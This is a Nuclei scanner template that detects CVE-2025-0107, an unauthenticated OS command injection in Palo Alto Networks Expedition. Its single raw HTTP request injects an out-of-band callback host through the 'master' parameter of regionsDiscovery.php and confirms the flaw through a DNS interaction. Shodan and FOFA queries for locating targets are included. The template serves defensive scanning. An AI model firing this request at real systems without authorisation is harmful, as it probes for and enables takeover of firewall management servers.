id: CVE-2025-0107

info:
  name: Palo Alto Networks Expedition - OS Command Injection
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands on Palo Alto Networks Expedition servers, leading to disclosure of sensitive firewall credentials, configurations, and API keys that could compromise all connected PAN-OS firewalls.
  remediation: |
    Upgrade to the latest patched version of Palo Alto Networks Expedition as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/PAN-SA-2025-0001
    - https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-0107
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    epss-score: 0.81649
    epss-percentile: 0.99209
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Expedition"
    fofa-query: title=="Expedition Project"
  tags: cve,cve2025,rce,paloalto,expedition,vkev,vuln

http:
  - raw:
      - |
        GET /API/regionsDiscovery.php?master=spark%3A%2F%2F{{interactsh-url}}:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis&regions=&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'msg":"Started'
          - '"success":true'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a0047304502204303ffd7fcdd466e778c0e6f2350ee68b83b4b524bbddd045d7539ded440639d022100f6edb0f166d111319c8b593ca9dbfa0bba96bf592bb6f9c95ade5ceb4d7998c5:922c64590222798bb761d5b6d8e72950